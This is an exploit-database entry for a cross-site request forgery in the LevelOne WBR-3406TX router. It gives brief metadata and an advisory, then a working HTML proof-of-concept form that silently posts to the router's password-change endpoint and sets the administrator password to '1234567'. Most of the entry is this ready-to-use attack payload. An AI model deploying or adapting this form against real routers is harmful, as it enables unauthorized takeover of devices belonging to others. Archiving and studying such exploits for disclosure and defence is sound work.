EXPLOITS

LevelOne WBR-3406TX Router - Cross-Site Request Forgery

Author: Yakir Wizman
type: remote
platform: hardware
port: 
date_added: 2013-11-15  
date_updated: 2015-12-03  
verified: 1  
codes: OSVDB-100419  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 38851.html  

source: https://www.securityfocus.com/bid/63908/info

LevelOne WBR-3406TX router is prone to a cross-site request-forgery vulnerability.

Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.

<html>
<body>
<form action="http://www.example.com/cgi-bin/pass" method="POST">
<input type="hidden" name="rc" value="@" />
<input type="hidden" name="Pa" value="1234567" />
<input type="hidden" name="P1" value="1234567" />
<input type="hidden" name="rd" value="atbox" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>